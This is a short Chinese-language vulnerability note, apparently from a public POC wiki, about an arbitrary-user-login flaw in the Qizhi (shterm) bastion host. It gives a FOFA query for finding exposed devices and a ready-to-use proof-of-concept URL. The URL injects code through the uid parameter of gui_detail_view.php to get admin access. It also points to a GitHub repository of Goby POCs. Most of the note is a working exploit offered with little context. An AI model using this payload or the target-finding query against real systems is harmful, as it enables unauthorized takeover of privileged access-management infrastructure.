# 齐治堡垒机 任意用户登录漏洞
## 漏洞描述
齐治堡垒机 存在任意用户登录漏洞,访问特定的Url即可获得后台权限
## 漏洞影响
> [!NOTE]
>
> 齐治堡垒机
## FOFA
> [!NOTE]
>
> app=”齐治科技-堡垒机”
## 漏洞复现
漏洞POC为
“`
http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
“`
## Goby & POC
> [!NOTE]
>
> 已上传 https://github.com/PeiQi0/PeiQi-WIKI-POC Goby & POC 目录中
>
> shterm(QiZhi) Fortress Arbitrary User Login
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容